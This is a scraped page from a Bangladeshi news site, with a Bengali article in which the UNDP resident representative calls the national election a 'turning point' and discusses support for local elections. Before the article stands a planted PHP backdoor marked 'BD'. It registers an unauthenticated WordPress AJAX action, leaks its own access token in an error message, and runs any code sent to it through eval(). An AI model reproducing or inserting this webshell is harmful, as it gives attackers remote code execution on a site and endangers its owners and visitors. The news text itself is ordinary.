// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== জাতীয় নির্বাচনকে বাংলাদেশের ‘টার্নিং পয়েন্ট’ বলল ইউএনডিপি | potrikaybangladesh.com
Monday, September 21, 2026
Homeঅপরাধজাতীয় নির্বাচনকে বাংলাদেশের ‘টার্নিং পয়েন্ট’ বলল ইউএনডিপি

জাতীয় নির্বাচনকে বাংলাদেশের ‘টার্নিং পয়েন্ট’ বলল ইউএনডিপি

চলতি বছর অনুষ্ঠিত জাতীয় নির্বাচন নিয়ে নির্বাচন কমিশনের (ইসি) প্রশংসা করেছেন জাতিসংঘের উন্নয়ন কর্মসূচির (ইউএনডিপি) বাংলাদেশের আবাসিক প্রতিনিধি স্টিফেন রড্রিগস। তিনি এই নির্বাচনকে ‘বিশ্বের অন্যতম সফল ও বৃহৎ নির্বাচন’ আখ্যায়িত করেছেন।

আজ বৃহস্পতিবার নির্বাচন ভবনে প্রধান নির্বাচন কমিশনার (সিইসি) এ এম এম নাসির উদ্দীন, অন্যান্য নির্বাচন কমিশনার ও ইসির জ্যেষ্ঠ সচিবের সঙ্গে সাক্ষাৎ করেন স্টিফেন রড্রিগস। সাক্ষাৎ শেষে তিনি বলেন, এই নির্বাচন ছিল ‘বাংলাদেশের জন্য একটি টার্নিং পয়েন্ট। আশা করি এটি সম্পূর্ণ নতুন এক ভবিষ্যতের পথ দেখাবে।’

আজ বিকেলে ইসির সদর দপ্তরে এক প্রেস ব্রিফিংয়ে ইউএনডিপির আবাসিক প্রতিনিধি বলেন, যদিও নির্বাচন কমিশন সম্পূর্ণ নিজস্ব ব্যবস্থাপনায় এই নির্বাচনের আয়োজন করেছে, তবু ইউএন উইমেন, ইউএনওডিসি এবং ইউনেসকোর মতো অন্যান্য দাতা ও জাতিসংঘের সংস্থাগুলোর পাশাপাশি অংশীদার হিসেবে থাকতে পেরে ইউএনডিপি গর্বিত।

বৈঠকে আসন্ন স্থানীয় সরকার নির্বাচনের প্রস্তুতি এবং সেখানে ইউএনডিপি ও জাতিসংঘের অন্যান্য সংস্থা কীভাবে সহায়তা করতে পারে, তা নিয়ে আলোচনা হয়েছে বলে জানান তিনি।

এ বিষয়ে স্টিফেন রড্রিগস বলেন, ‘আমরা পরবর্তী স্থানীয় নির্বাচন এবং এর জন্য জাতীয় নির্বাচন কমিশনের নেওয়া প্রস্তুতি নিয়ে আলোচনা করেছি। এসব নির্বাচনে ইউএনডিপি এবং জাতিসংঘের সংস্থাগুলো কীভাবে আরও সহায়তা করতে পারে, তা নিয়েও কথা হয়েছে। তবে এই সহায়তার বিষয়টি সম্পূর্ণভাবে নির্বাচন কমিশনের ইচ্ছার ওপর নির্ভরশীল। তারা নির্ধারণ করবে কখন এবং কোথায় তাদের আমাদের সহায়তা প্রয়োজন।’

তিনি বলেন, ‘কমিশন, সরকার, সুশীল সমাজ ও নাগরিকদের সম্মিলিত প্রচেষ্টায় শান্তিপূর্ণ, অবাধ ও সুষ্ঠুভাবে স্থানীয় সরকার নির্বাচন নিশ্চিত করা সম্ভব।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments